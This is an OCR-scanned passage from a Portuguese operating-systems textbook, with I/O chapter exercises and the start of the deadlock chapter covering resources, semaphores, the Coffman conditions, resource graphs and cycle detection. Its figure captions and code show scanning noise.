300) | SISTEMAS OPERACIONAIS MODERNOS 


42. 


43. 


44. 


45. 


46. 


47. 


48. 


49. 


cima copiando seus bits de uma parte da RAM do vídeo 

para outra. Se uma janela em particular tiver 80 linhas 

de altura e 80 caracteres de largura (6400 caracteres, 
total), e uma caixa de caracteres tem 8 pixels de largura 

por 16 pixels de altura, quanto tempo leva para passar a 

janela inteira a uma taxa de cópia de 50 ns por byte? Se 

todas as linhas têm 80 caracteres de comprimento, qual 

é a taxa de símbolos por segundo (baud rate) do termi- 

nal? Colocar um caractere na tela leva 5 us. Quantas 

linhas por segundo podem ser exibidas? 

Após receber um caractere DEL (SIGINT), o driver do 

monitor descarta toda a saída atualmente em fila para 

aquele monitor. Por quê? 

Um usuário em um terminal emite um comando para 

um editor remover a palavra na linha 5 ocupando as 

posições de caractere 7 até e incluindo 12. Presumindo 

que o cursor não está na linha 5 quando o comando é 

dado, qual sequência de escape ANSI o editor deve emi- 

tir para remover a palavra? 

Os projetistas de um sistema de computador esperavam 

que o mouse pudesse ser movido a uma taxa máxima 

de 20 cm/s. Se um mickey é 0,1 mm e cada mensagem do 
mouse tem 3 bytes, qual é a taxa de dados máxima do mou- 
se presumindo que cada mickey é relatado separadamente? 

As cores primárias aditivas são vermelho, verde e azul, o 

que significa que qualquer cor pode ser construída a par- 

tir da superposição linear dessas cores. É possível que 
uma pessoa tenha uma fotografia colorida que não possa 
ser representada usando uma cor de 24 bits inteira? 

Uma maneira de colocar um caractere em uma tela com 

mapa de bits é usar BitBlt com uma tabela de fontes. 

Presuma que uma fonte em particular usa caracteres que 

são 16 x 24 pixels em cor RGB (red, green, blue) real. 

(a) Quanto espaço da tabela de fonte cada caractere 
ocupa? 

(b) Se copiar um byte leva 100 ns, incluindo so- 
brecarga, qual é a taxa de saída para a tela em 
caracteres/s? 

Presumindo que são necessários 2 ns para copiar um byte, 

quanto tempo leva para reescrever completamente uma 

tela de modo texto com 80 caracteres x 25 linhas, no 
modo de tela mapeada na memória? E uma tela em modo 
gráfico com 1024 x 768 pixels com 24 bits de cores? 

Na Figura 5.36 há uma classe para RegisterClass. No có- 

digo X Window correspondente, na Figura 5.34, não há 

uma chamada assim, nem algo parecido. Por que nao? 

No texto demos um exemplo de como desenhar um re- 

tângulo na tela usando o Windows GDI: 


Rectangle(hdc, xleft, ytop, xright, ybottom); 


Existe mesmo a necessidade para o primeiro parâme- 
tro (hdc), e se afirmativo, qual? Afinal de contas, as 
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coordenadas do retângulo estão explicitamente especi- 
ficadas como parâmetros. 

Um terminal de cliente magro é usado para exibir uma 
página na web contendo um desenho animado de tama- 
nho 400 pixels x 160 pixels executando a 10 quadros/s. 
Qual fração de um Fast Ethernet de 100 Mbps é consu- 
mida exibindo o desenho? 

Foi observado que um sistema de cliente magro fun- 
ciona bem com uma rede de 1 Mbps em um teste. É 
provável que ocorram problemas em uma situação de 
múltiplos usuários? (Dica: considere um grande nú- 
mero de usuários assistindo a um programa de TV pro- 
gramado e o mesmo número de usuários navegando na 
internet.) 

Descreva duas vantagens e duas desvantagens da com- 
putação com clientes magros. 

Se a voltagem máxima da CPU, V, for cortada para V/n, 
seu consumo de energia cairá para 1/n? do seu valor ori- 
ginal e sua velocidade de relógio cairá para 1/n do seu 
valor original. Suponha que um usuário está digitando a 
1 caractere/s, mas o tempo da CPU necessário para pro- 
cessar cada caractere é 100 ms. Qual é o valor ótimo de 
n e qual é a economia de energia correspondente percen- 
tualmente comparada com não cortar a voltagem? Presu- 
ma que uma CPU ociosa não consuma energia alguma. 
Um notebook é configurado para tirar o máximo de van- 
tagem das características de economia de energia, in- 
cluindo desligar o monitor e o disco rígido após períodos 
de inatividade. Uma usuária às vezes executa programas 
UNIX em modo de texto e outras vezes usa o Sistema 
X Window. Ela ficou surpresa ao descobrir que a vida 
da bateria é significativamente mais longa quando usa 
programas somente de texto. Por quê? 

Escreva um programa que simule o armazenamento es- 
tável. Use dois arquivos grandes de comprimento fixo 
no seu disco para simular os dois discos. 

Escreva um programa para implementar os três algoritmos 
de escalonamento de braço de disco. Escreva um progra- 
ma de driver que gere uma sequência de números de cilin- 
dro (0-999) ao acaso, execute os três algoritmos para essa 
sequência e imprima a distância total (número de cilindros) 
que o braço precisa para percorrer nos três algoritmos. 
Escreva um programa para implementar múltiplos tem- 
porizadores usando um único relógio. A entrada para 
esse programa consiste em uma sequência de quatro 
tipos de comandos (S <int>, T, E <int>, P): S <int> es- 
tabelece o tempo atual para <int>; T é um tique de reló- 
gio; e E <int> escalona um sinal para ocorrer no tempo 
<int>; P imprime os valores do Tempo atual, Próximo 
sinal e Cabeçalho do relógio. O seu programa também 
deve imprimir um comando sempre que for chegado o 
momento de gerar um sinal. 


CAPÍTULO 


s sistemas computacionais estão cheios de recursos 

que podem ser usados somente por um processo de 

cada vez. Exemplos comuns incluem impressoras, 

unidades de fita para backup de dados da empresa 

e entradas nas tabelas internas do sistema. Ter dois 
processos escrevendo simultaneamente para a impresso- 
ra gera uma saída ininteligível. Ter dois processos usando 
a mesma entrada da tabela do sistema de arquivos inva- 
riavelmente levará a um sistema de arquivos corrompido. 
Em consequência, todos os sistemas operacionais têm a 
capacidade de conceder (temporariamente) acesso exclu- 
sivo a um processo a determinados recursos. 

Para muitas aplicações, um processo precisa de aces- 
so exclusivo a não somente um recurso, mas a vários. 
Suponha, por exemplo, que dois processos queiram cada 
um gravar um documento escaneado em um disco Blu- 
-ray. O processo A solicita permissão para usar o scan- 
ner e ela lhe é concedida. O processo B é programado 
diferentemente e solicita o gravador Blu-ray primeiro e 
ele também lhe é concedido. Agora 4 pede pelo gravador 
Blu-ray, mas a solicitação é suspensa até que B o libe- 
re. Infelizmente, em vez de liberar o gravador Blu-ray, B 
pede pelo scanner. A essa altura ambos os processos estão 
bloqueados e assim permanecerão para sempre. Essa si- 
tuação é chamada de impasse (deadlock). 

Impasses também podem ocorrer entre máqui- 
nas. Por exemplo, muitos escritórios têm uma rede de 
área local com muitos computadores conectados a ela. 
Muitas vezes dispositivos como scanners, gravadores 
Blu-ray/DVDs, impressoras e unidades de fitas estão 
conectados à rede como recursos compartilhados, dis- 
poníveis para qualquer usuário em qualquer máquina. 
Se esses dispositivos puderem ser reservados remota- 
mente (isto é, da máquina da casa do usuário), impasses 





do mesmo tipo podem ocorrer como descrito. Situações 
mais complicadas podem provocar impasses envolven- 
do três, quatro ou mais dispositivos e usuários. 

Impasses também podem ocorrer em uma série de 
outras situações. Em um sistema de banco de dados, por 
exemplo, um programa pode ter de bloquear vários re- 
gistros que ele está usando a fim de evitar condições de 
corrida. Se o processo 4 bloqueia o registro R/ e o pro- 
cesso B bloqueia o registro R2, e então cada processo 
tenta bloquear o registro do outro, também teremos um 
impasse. Portanto, impasses podem ocorrer em recursos 
de hardware ou em recursos de software. 

Neste capítulo, examinaremos vários tipos de impas- 
ses, ver como eles surgem, e estudar algumas maneiras 
de preveni-los ou evitá-los. Embora esses impasses sur- 
jam no contexto de sistemas operacionais, eles também 
ocorrem em sistemas de bancos de dados e em muitos 
outros contextos na ciência da computação; então, este 
material é aplicável, na realidade, a uma ampla gama de 
sistemas concorrentes. 

Muito já foi escrito sobre impasses. Duas biblio- 
grafias sobre o assunto apareceram na Operating Sys- 
tems Review e devem ser consultadas para referências 
(NEWTON, 1979; e ZOBEL, 1983). Embora essas bi- 
bliografias sejam muito antigas, a maior parte dos tra- 
balhos sobre impasses foi feita bem antes de 1980, de 
maneira que eles ainda são úteis. 


6.1 Recursos 


Uma classe importante de impasses envolve recursos 
para os quais algum processo teve acesso exclusivo con- 
cedido. Esses recursos incluem dispositivos, registros de 
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dados, arquivos e assim por diante. Para tornar a discus- 
são dos impasses mais geral possível, vamos nos referir 
aos objetos concedidos como recursos. Um recurso pode 
ser um dispositivo de hardware (por exemplo, uma uni- 
dade de Blu-ray) ou um fragmento de informação (por 
exemplo, um registro em um banco de dados). Um com- 
putador normalmente terá muitos recursos diferentes que 
um processo pode adquirir. Para alguns recursos, várias 
instâncias idênticas podem estar disponíveis, como três 
unidades de Blu-rays. Quando várias cópias de um recur- 
so encontram-se disponíveis, qualquer uma delas pode 
ser usada para satisfazer qualquer pedido pelo recurso. 
Resumindo, um recurso é qualquer coisa que precisa ser 
adquirida, usada e liberada com o passar do tempo. 


6.1.1 Recursos preemptíveis e não preemptíveis 


Ha dois tipos de recursos: preemptíveis e não pre- 
emptíveis. Um recurso preemptível é aquele que pode 
ser retirado do processo proprietário sem causar-lhe 
prejuízo algum. A memória é um exemplo de um re- 
curso preemptível. Considere, por exemplo, um sistema 
com uma memória de usuário de 1 GB, uma impressora 
e dois processos de 1 GB cada que querem imprimir 
algo. O processo A solicita e ganha a impressora, então 
começa a computar os valores para imprimir. Antes que 
ele termine a computação, ele excede a sua parcela de 
tempo e é mandado para o disco. 

O processo B executa agora e tenta, sem sucesso no 
fim das contas, ficar com a impressora. Potencialmente, 
temos agora uma situação de impasse, pois 4 tem a im- 
pressora e B tem a memória, e nenhum dos dois pode 
proceder sem o recurso contido pelo outro. Felizmente, 
é possível obter por preempção (tomar a memória) de 
B enviando-o para o disco e trazendo 4 de volta. Agora 
A pode executar, fazer sua impressão e então liberar a 
impressora. Nenhum impasse ocorre. 

Um recurso não preemptível, por sua vez, é um re- 
curso que não pode ser tomado do seu proprietário atual 
sem potencialmente causar uma falha. Se um processo 
começou a ser executado em um Blu-ray, tirar o grava- 
dor Blu-ray dele de repente e dá-lo a outro processo re- 
sultará em um Blu-ray bagunçado. Gravadores Blu-ray 
não são preemptíveis em um momento arbitrário. 

A questão se um recurso é preemptível depende do 
contexto. Em um PC padrão, a memória é preempti- 
vel porque as páginas sempre podem ser enviadas para 
o disco para depois recuperá-las. No entanto, em um 
smartphone que não suporta trocas (swapping) ou pagi- 
nação, impasses não podem ser evitados simplesmente 
trocando uma porção da memória. 


Em geral, impasses envolvem recursos não preempti- 
veis. Impasses potenciais que envolvem recursos preemp- 
tíveis normalmente podem ser solucionados realocando 
recursos de um processo para outro. Desse modo, nosso 
estudo enfocará os recursos não preemptíveis. 

A sequência abstrata de eventos necessários para 
usar um recurso é dada a seguir. 


1. Solicitar o recurso. 
2. Usar o recurso. 
3. Liberar o recurso. 


Se o recurso não está disponível quando ele é so- 
licitado, o processo que o está solicitando é forçado a 
esperar. Em alguns sistemas operacionais, o processo é 
automaticamente bloqueado quando uma solicitação de 
recurso falha, e despertado quando ela torna-se dispo- 
nível. Em outros sistemas, a solicitação falha com um 
código de erro, e cabe ao processo que está fazendo a 
chamada esperar um pouco e tentar de novo. 

Um processo cuja solicitação de recurso foi negada 
há pouco, normalmente esperará em um laço estreito so- 
licitando o recurso, dormindo ou tentando novamente. 
Embora esse processo não esteja bloqueado, para todos 
os efeitos e propósitos é como se estivesse, pois ele não 
pode realizar nenhum trabalho útil. Mais adiante, presu- 
miremos que, quando um processo tem uma solicitação 
de recurso negada, ele é colocado para dormir. 

A exata natureza da solicitação de um recurso é alta- 
mente dependente do sistema. Em alguns sistemas, uma 
chamada de sistema request é fornecida para permitir 
que os processos peçam explicitamente por recursos. 
Em outros, os únicos recursos que o sistema operacio- 
nal conhece são arquivos especiais que somente um 
processo pode ter aberto de cada vez. Esses são abertos 
pela chamada open usual. Se o arquivo já está sendo 
usado, o processo chamador é bloqueado até o arquivo 
ser fechado pelo seu proprietário atual. 


6.1.2 Aquisição de recursos 


Para alguns tipos de recursos, como registros em um 
sistema de banco de dados, cabe aos processos do usuá- 
rio, em vez do sistema, gerenciar eles mesmos o uso de 
recursos. Uma maneira de permitir isso é associar um 
semáforo a cada recurso. Esses semáforos são todos ini- 
cializados com 1. Também podem ser usadas variáveis 
do tipo mutex. Os três passos listados são então imple- 
mentados como um down no semáforo para aquisição 
e utilização do recurso e, por fim, um up no semáforo 
para liberação do recurso. Esses passos são mostrados 
na Figura 6.1(a). 


alelo ASAE O uso de um semáforo para proteger recursos. (a) 
Um recurso. (b) Dois recursos. 
typedef int semaphore; typedef int semaphore; 
semaphore resource. 1; semaphore resource. 1; 
semaphore resource. 2; 


void process. A(void) { 
down(&resource. 1); 


void process. A(void) { 
down(&resource _ 1); 
use resource 1(); down(&resource 2); 
up(&resource. 1); use. both resources( ); 

} up(&resource 2); 

up(&resource _ 1); 


(a) (b) 


As vezes, processos precisam de dois ou mais re- 
cursos. Eles podem ser adquiridos em sequéncia, como 
mostrado na Figura 6.1(b). Se mais de dois recursos sao 
necessários, eles são simplesmente adquiridos um de- 
pois do outro. 

Até aqui, nenhum problema. Enquanto apenas um pro- 
cesso estiver envolvido, tudo funciona bem. É claro, com 
apenas um processo, não há a necessidade de adquirir for- 
malmente recursos, já que não há competição por eles. 

Agora vamos considerar uma situação com dois pro- 
cessos, 4 e B, e dois recursos. Dois cenários são descri- 
tos na Figura 6.2. Na Figura 6.2(a), ambos os processos 
solicitam pelos recursos na mesma ordem. Na Figura 
6.2(b), eles os solicitam em uma ordem diferente. Essa 
diferença pode parecer menor, mas não é. 

Na Figura 6.2(a), um dos processos adquirirá o pri- 
meiro recurso antes do outro. Esse processo então será 
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bem-sucedido na aquisição do segundo recurso e reali- 
zará o seu trabalho. Se o outro processo tentar adquirir 
o recurso 1 antes que ele seja liberado, o outro processo 
simplesmente será bloqueado até que o recurso esteja 
disponível. 

Na Figura 6.2(b), a situação é diferente. Pode ocor- 
rer que um dos processos adquira ambos os recursos 
e efetivamente bloqueie o outro processo até concluir 
seu trabalho. No entanto, pode também acontecer de 
o processo 4 adquirir o recurso 1 e o processo B ad- 
quirir o recurso 2. Cada um bloqueará agora quan- 
do tentar adquirir o outro recurso. Nenhum processo 
executará novamente. Má notícia: essa situação é um 
impasse. 

Vemos aqui o que parece ser uma diferença menor 
em estilo de codificação — qual recurso adquirir pri- 
meiro — no fim das contas, faz a diferença entre o pro- 
grama funcionar ou falhar de uma maneira difícil de ser 
detectada. Como impasses podem ocorrer tão facilmen- 
te, muita pesquisa foi feita para descobrir maneiras de 
lidar com eles. Este capítulo discute impasses em deta- 
lhe e o que pode ser feito a seu respeito. 


6.2 Introdução aos impasses 


Um impasse pode ser definido formalmente como a 
seguir: 

Um conjunto de processos estará em situação de im- 
passe se cada processo no conjunto estiver esperando 
por um evento que apenas outro processo no conjunto 
pode causar. 


Jei: TE] (a) Código livre de impasses. (b) Código com impasse potencial. 


typedef int semaphore; 
semaphore resource. 1; 
semaphore resource 2; 


void process. A(void) { 
down(&resource _ 1); 
down(&resource _ 2); 
use. both resources( ); 
up(&resource. 2); 
up(&resource. 1); 


} 


void process_B(void) { 
down(&resource _ 1); 
down(&resource 2); 
use. both resources( ); 
up(&resource. 2); 
up(&resource. 1); 


(a) 


semaphore resource. 1; 
semaphore resource 2; 


void process. A(void) { 
down(&resource _ 1); 
down(&resource _2); 
use. both. resources( ); 
up(&resource. 2); 
up(&resource. 1); 


} 


void process_B(void) { 
down(&resource _ 2); 
down(&resource _ 1); 
use. both resources( ); 
up(&resource. 1); 
up(&resource. 2); 


(b) 
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Como todos os processos estão esperando, nenhum 
deles jamais causará qualquer evento que possa des- 
pertar um dos outros membros do conjunto, e todos os 
processos continuam a esperar para sempre. Para esse 
modelo, presumimos que os processos têm um único 
thread e que nenhuma interrupção é possível para des- 
pertar um processo bloqueado. A condição de não haver 
interrupções é necessária para evitar que um processo 
em situação de impasse seja acordado por, digamos, um 
alarme, e então cause eventos que liberem outros pro- 
cessos no conjunto. 

Na maioria dos casos, o evento que cada processo 
está esperando é a liberação de algum recurso atualmen- 
te possuído por outro membro do conjunto. Em outras 
palavras, cada membro do conjunto de processos em 
situação de impasse está esperando por um recurso que 
é de propriedade do processo em situação de impasse. 
Nenhum dos processos pode executar, nenhum deles 
pode liberar quaisquer recursos e nenhum pode ser 
desperto. O número de processos e o número e tipo de 
recursos possuídos e solicitados não têm importância. 
Esse resultado é válido para qualquer tipo de recurso, 
incluindo hardwares e softwares. Esse tipo de impasse 
é chamado de impasse de recurso, e é provavelmen- 
te o tipo mais comum, mas não o único. Estudaremos 
primeiro os impasses de recursos em detalhe e, então, 
no fim do capítulo, retornaremos brevemente para os 
outros tipos de impasses. 


6.2.1 Condições para ocorrência de impasses 


Coffman et al. (1971) demonstraram que quatro con- 
dições têm de ser válidas para haver um impasse (de 
recurso): 


1. Condição de exclusão mútua. Cada recurso está 
atualmente associado a exatamente um processo 
ou está disponível. 

2. Condição de posse e espera. Processos atualmen- 
te de posse de recursos que foram concedidos an- 
tes podem solicitar novos recursos. 

3. Condição de não preempção. Recursos concedi- 
dos antes não podem ser tomados à força de um 
processo. Eles precisam ser explicitamente libe- 
rados pelo processo que os têm. 

4. Condição de espera circular. Deve haver uma lis- 
ta circular de dois ou mais processos, cada um 
deles esperando por um processo de posse do 
membro seguinte da cadeia. 


Todas essas quatro condições devem estar presen- 
tes para que um impasse de recurso ocorra. Se uma 


delas estiver ausente, nenhum impasse de recurso 
será possível. 

Vale a pena observar que cada condição relacio- 
na-se com uma política que um sistema pode ter ou 
não. Pode um dado recurso ser designado a mais um 
processo ao mesmo tempo? Pode um processo ter a 
posse de um recurso e pedir por outro? Os recursos 
podem passar por preempção”? Esperas circulares po- 
dem existir? Mais tarde veremos como os impasses 
podem ser combatidos tentando negar-lhes algumas 
dessas condições. 


6.2.2 Modelagem de impasses 


Holt (1972) demonstrou como essas quatro condi- 
ções podem ser modeladas com grafos dirigidos. Os 
grafos têm dois tipos de nós: processos, mostrados 
como círculos, e recursos, mostrados como quadrados. 
Um arco direcionado de um nó de recurso (quadra- 
do) para um nó de processo (círculo) significa que o 
recurso foi previamente solicitado, concedido e está 
atualmente com aquele processo. Na Figura 6.3(a), o 
recurso R está atualmente alocado ao processo 4. 

Um arco direcionado de um processo para um recur- 
so significa que o processo está atualmente bloqueado 
esperando por aquele recurso. Na Figura 6.3(b), o pro- 
cesso B está esperando pelo recurso S. Na Figura 6.3(c) 
vemos um impasse: o processo C está esperando pelo 
recurso T, que atualmente está sendo usado pelo proces- 
so D. O processo D não está prestes a liberar o recurso T 
porque ele está esperando pelo recurso U, sendo usado 
por C. Ambos os processos esperarão para sempre. Um 
ciclo no grafo significa que há um impasse envolvendo 
OS processos e recursos no ciclo (presumindo que há um 
recurso de cada tipo). Nesse exemplo, o ciclo é C— T — 
D-U-C. 

Agora vamos examinar um exemplo de como grafos 
de recursos podem ser usados. Imagine que temos trés 


gelt] Grafos de alocação de recursos. (a) Processo 
de posse de um recurso. (b) Solicitação de um 
recurso. (c) Impasse. 


(a) 


(a) (b) (c) 





processos, A, Be C, e três recursos, R, S e T. As solici- 
tações e as liberações dos três processos são dadas na 
Figura 6.4(a) a (c). O sistema operacional está liberado 
para executar qualquer processo desbloqueado a qual- 
quer instante, então ele poderia decidir executar 4 até 
A ter concluído o seu trabalho, então executar B até sua 
conclusão e por fim executar C. 

Essa ordem de execução não leva a impasse algum 
(pois não há competição por recursos), mas também não 
há paralelismo algum. Além de solicitar e liberar re- 
cursos, processos calculam e realizam E/S. Quando os 
processos são executados sequencialmente, não existe 
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a possibilidade de enquanto um processo espera pela 
E/S, outro poder usar a CPU. Desse modo, executar os 
processos de maneira estritamente sequencial pode nao 
ser uma opção ótima. Por outro lado, se nenhum dos 
processos realizar qualquer E/S, o algoritmo trabalho 
mais curto primeiro é melhor do que a alternância cir- 
cular, de maneira que em determinadas circunstâncias 
executar todos os processos sequencialmente pode ser 
a melhor maneira. 

Vamos supor agora que os processos realizam E/S e 
computação, então a alternância circular é um algoritmo 
de escalonamento razoável. As solicitações de recursos 


leia) Um exemplo de como um impasse ocorre e como ele pode ser evitado. 


A 
Requisita R 
Requisita S 
Libera R 
Libera S 


(a) 


@) (8) © 
R] is] E] 
(e) 


OO 


1. A requisita R 
2. B requisita S 
3. C requisita T 
4. A requisita S 
5. B requisita T 
6. C requisita R 
impasse 


(d) 


1. A requisita R 

2. C requisita T 

3. A requisita S 

4. C requisita R 

5. A libera R 

6. A libera S 
nenhum impasse 


(k) 


B C 
Requisita S Requisita T 
Requisita T Requisita R 
Libera S Libera T 
Libera T Libera R 


(b) (c) 


DCO O©@ © 
Rj [s] fr] 


(1) (9) 





(m) (n) 
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podem ocorrer na ordem da Figura 6.4(d). Se as seis so- 
licitações forem executadas nessa ordem, os seis grafos 
de recursos resultantes serão como mostrado na Figura 
6.4 (e) a (j). Após a solicitação 4 ter sido feita, A blo- 
queia esperando por S, como mostrado na Figura 6.4(h). 
Nos próximos dois passos, B e € também bloqueiam, 
em última análise levando a um ciclo e ao impasse da 
Figura 6.4(j). 

No entanto, como já mencionamos, não é exigido do 
sistema operacional que execute os processos em qual- 
quer ordem especial. Em particular, se conceder uma so- 
licitação específica pode levar a um impasse, o sistema 
operacional pode simplesmente suspender o processo 
sem conceder a solicitação (isto é, apenas não escalo- 
nar o processo) até que seja seguro. Na Figura 6.4, se o 
sistema operacional soubesse a respeito do impasse imi- 
nente, ele poderia suspender B em vez de conceder-lhe 
S. Ao executar apenas 4 e C, teríamos as solicitações 
e liberações da Figura 6.4(k) em vez da Figura 6.4(d). 
Essa sequência conduz aos grafos de recursos da Figura 
6.4(1) a (q), que não levam a um impasse. 

Após o passo (q), S pode ser concedido ao processo 
B porque A foi concluído e C tem tudo de que ele pre- 
cisa. Mesmo que B bloqueie quando solicita 7, nenhum 
impasse pode ocorrer. B apenas esperará até que C tenha 
terminado. 

Mais tarde neste capítulo estudaremos um algorit- 
mo detalhado para tomar decisões de alocação que não 
levam a um impasse. Por ora, basta compreender que 
grafos de recursos são uma ferramenta que nos deixa 
ver se uma determinada sequência de solicitação/li- 
beração pode levar a um impasse. Apenas atendemos 
às solicitações e liberações passo a passo e após cada 
passo conferimos o grafo para ver se ele contém algum 
ciclo. Se afirmativo, temos um impasse; se não, não há 
impasse. Embora nosso tratamento de grafos de recur- 
sos tenha sido para o caso de um único recurso de cada 
tipo, grafos de recursos também podem ser generaliza- 
dos para lidar com múltiplos recursos do mesmo tipo 
(HOLT, 1972). 

Em geral, quatro estratégias são usadas para lidar 
com impasses. 


1. Simplesmente ignorar o problema. Se você o ig- 
norar, quem sabe ele ignore você. 

2. Detecção e recuperação. Deixe-os ocorrer, detec- 
te-os e tome as medidas cabíveis. 

3. Evitar dinamicamente pela alocação cuidadosa 
de recursos. 





4. Prevenção, ao negar estruturalmente uma das 
quatro condições. 


Nas próximas quatro seções, examinaremos cada um 
desses métodos. 


6.3 Algoritmo do avestruz 


A abordagem mais simples é o algoritmo do aves- 
truz: enfie a cabeça na areia e finja que não há um pro- 
blema.! As pessoas reagem a essa estratégia de maneiras 
diferentes. Matemáticos a consideram inaceitável e di- 
zem que os impasses devem ser evitados a todo custo. 
Engenheiros perguntam qual a frequência que se espe- 
ra que o problema ocorra, qual a frequência com que 
ocorrem quedas no sistema por outras razões e quão 
sério um impasse é realmente. Se os impasses ocorrem 
na média uma vez a cada cinco anos, mas quedas do 
sistema decorrentes de falhas no hardware e defeitos 
no sistema operacional ocorrem uma vez por semana, a 
maioria dos engenheiros não estaria disposta a pagar um 
alto preço em termos de desempenho ou conveniência 
para eliminar os impasses. 

Para tornar esse contraste mais específico, con- 
sidere um sistema operacional que bloqueia o cha- 
mador quando uma chamada de sistema open para 
um dispositivo físico como um driver de Blu-ray ou 
uma impressora não pode ser executada porque o 
dispositivo está ocupado. Tipicamente cabe ao dri- 
ver do dispositivo decidir qual ação tomar sob essas 
circunstâncias. Bloquear ou retornar um código de 
erro são duas possibilidades óbvias. Se um processo 
tiver sucesso em abrir a unidade de Blu-ray e outro tiver 
sucesso em abrir a impressora e então os dois tenta- 
rem abrir o recurso um do outro e forem bloqueados 
tentando, temos um impasse. Poucos sistemas atuais 
detectarão isso. 


6.4 Detecção e recuperação de impasses 


Uma segunda técnica é a detecção e recuperação. 
Quando essa técnica é usada, o sistema não tenta evitar 
a ocorrência dos impasses. Em vez disso, ele os dei- 
xa ocorrer, tenta detectá-los quando acontecem e en- 
tão toma alguma medida para recuperar-se após o fato. 
Nesta seção examinaremos algumas maneiras como os 
impasses podem ser detectados e tratados. 


1 Na realidade, essa parte do folclore é uma bobagem. Avestruzes conseguem correr a 60 km/h e seu coice é poderoso o suficiente para 
matar qualquer leão com visões de um grande prato de frango, e os leões sabem disso. (N. A.) 


6.4.1 Detecção de impasses com um recurso de 
cada tipo 


Vamos começar com o caso mais simples: existe 
apenas um recurso de cada tipo. Um sistema assim po- 
deria ter um scanner, um gravador Blu-ray, uma plotter 
e uma unidade de fita, mas não mais do que um de cada 
classe de recurso. Em outras palavras, estamos excluin- 
do sistemas com duas impressoras por ora. Trataremos 
deles mais tarde, usando um método diferente. 

Para esse sistema, podemos construir um grafo de re- 
cursos do tipo ilustrado na Figura 6.3. Se esse grafo con- 
tém um ou mais ciclos, há um impasse. Qualquer processo 
que faça parte de um ciclo está em situação de impasse. Se 
não existem ciclos, o sistema não está em impasse. 

Como um exemplo de um sistema mais complexo do 
que aqueles que examinamos até o momento, considere 
um sistema com sete processos, 4 até G e seis recursos, R 
até W. O estado de quais recursos estão sendo atualmente 
usados e quais estão sendo solicitados é o seguinte: 


1. O processo A possui R e solicita S. 

O processo B não possui nada, mas solicita T. 
O processo C não possui nada, mas solicita S. 
O processo D possui U e solicita S e T. 

O processo E possui T e solicita V. 

O processo F possui W e solicita S. 

7. O processo G possui Ve solicita U. 


Oye. fa 


A questão é: “Esse sistema está em impasse? E se 
estiver, quais processos estão envolvidos?”. 

Para responder, podemos construir o grafo de recur- 
sos da Figura 6.5(a). Esse grafo contém um ciclo, que 
pode ser visto por inspeção visual. O ciclo é mostrado 
na Figura 6.5(b). Desse ciclo, podemos ver que os pro- 
cessos D, E e G estão todos em situação de impasse. Os 
processos 4, C e F não estão em situação de impasse 


alelo ARS (a) Um grafo de recursos. 


bd 


b) Um ciclo extraído de (a). 
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porque S pode ser alocado para qualquer um deles, per- 
mitindo sua conclusão e retorno do recurso. Então os 
outros dois podem obtê-lo por sua vez e também ser 
finalizados. (Observe que a fim de tornar esse exemplo 
mais interessante permitimos que processos, a saber D, 
solicitasse por dois recursos ao mesmo tempo.) 

Embora seja relativamente simples escolher os pro- 
cessos em situação de impasse mediante inspeção visual 
de um grafo simples, para usar em sistemas reais preci- 
samos de um algoritmo formal para detectar impasses. 
Muitos algoritmos para detectar ciclos em grafos direcio- 
nados são conhecidos. A seguir exibiremos um algoritmo 
simples que inspeciona um grafo e termina quando ele 
encontrou um ciclo ou quando demonstrou que nenhum 
existe. Ele usa uma estrutura de dados dinâmica, L, uma 
lista de nós, assim como uma lista de arcos. Durante o al- 
goritmo, a fim de evitar inspeções repetidas, arcos serão 
marcados para indicar que já foram inspecionados. 

O algoritmo opera executando os passos a seguir 
como especificado: 


1. Para cada nó, N, no grafo, execute os cinco pas- 
sos a seguir com N como o nó de partida. 

2. Inicialize L como uma lista vazia e designe todos 
os arcos como desmarcados. 

3. Adicione o nó atual ao final de L e confira para 
ver se o nó aparece agora em L duas vezes. Se ele 
aparecer, o grafo contém um ciclo (listado em L) 
e o algoritmo termina. 

4. A partir do referido nó, verifique se há algum 
arco de saída desmarcado. Se afirmativo, vá para 
o passo 5; se não, vá para o passo 6. 

5. Escolha aleatoriamente um arco de saída desmar- 
cado e marque-o. Então siga-o para gerar o novo 
nó atual e vá para o passo 3. 

6. Se esse nó é o inicial, o grafo não contém ciclo 
algum e o algoritmo termina. De outra maneira, 
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chegamos agora a um beco sem saida. Remova-o 
e volte ao nó anterior, isto é, aquele que era atual 
imediatamente antes desse, faça dele o nó atual e 
vá para o passo 3. 


O que esse algoritmo faz é tomar cada nó, um de 
cada vez, como a raiz do que ele espera ser uma árvore e 
então realiza uma busca do tipo busca em profundidade 
nele. Se acontecer de ele voltar a um nó que já havia en- 
contrado, então o algoritmo encontrou um ciclo. Se ele 
exaurir todos os arcos de um dado nó, ele retorna ao nó 
anterior. Se ele retornar até a raiz e não conseguir seguir 
adiante, o subgrafo alcançável a partir do nó atual não 
contém ciclo algum. Se essa propriedade for válida para 
todos os nós, o grafo inteiro está livre de ciclos, então o 
sistema não está em impasse. 

Para ver como o algoritmo funciona na prática, va- 
mos usá-lo no grafo da Figura 6.5(a). A ordem de pro- 
cessamento dos nós é arbitrária; portanto, vamos apenas 
inspecioná-los da esquerda para a direita, de cima para 
baixo, executando primeiro o algoritmo começando em 
R, então sucessivamente A, B, C, S, D, T; E, F e assim por 
diante. Se depararmos com um ciclo, o algoritmo para. 

Começamos em R e inicializamos L como lista va- 
zia. Então adicionamos R à lista e vamos para a única 
possibilidade, 4, e a adicionamos a L, resultando em 
L =[R, A]. De A vamos para S, resultando em L = [R, 
A, S]. S não tem arcos de saída, então trata-se de um 
beco sem saída, forçando-nos a recuar para 4. Já que 4 
não tem arcos de saída desmarcados, recuamos para R, 
completando nossa inspeção de R. 

Agora reinicializamos o algoritmo começando em 
4, reinicializando L para a lista vazia. Essa busca tam- 
bém para rapidamente, então começamos novamente 
em B. De B continuamos para seguir os arcos de saída 
até chegarmos a D, momento em que L = [B, T, E, 
V, G, U, D]. Agora precisamos fazer uma escolha (ao 
acaso). Se escolhermos S, chegaremos a um beco sem 
saída e recuaremos para D. Na segunda tentativa, es- 
colhemos 7 e atualizamos L para ser [B, T, E, V, G, U, 
D, T], ponto em que descobrimos o ciclo e paramos o 
algoritmo. 

Esse algoritmo está longe de ser ótimo. Para um algo- 
ritmo melhor, ver Even (1979). Mesmo assim, ele demons- 
tra que existe um algoritmo para detecção de impasses. 


6.4.2 Detecção de impasses com múltiplos 
recursos de cada tipo 


Quando existem múltiplas cópias de alguns dos 
recursos, é necessária uma abordagem diferente para 


detectar impasses. Apresentaremos agora um algorit- 
mo baseado em matrizes para detectar impasses entre 
n processos, P a P. Seja m o número de classes de 
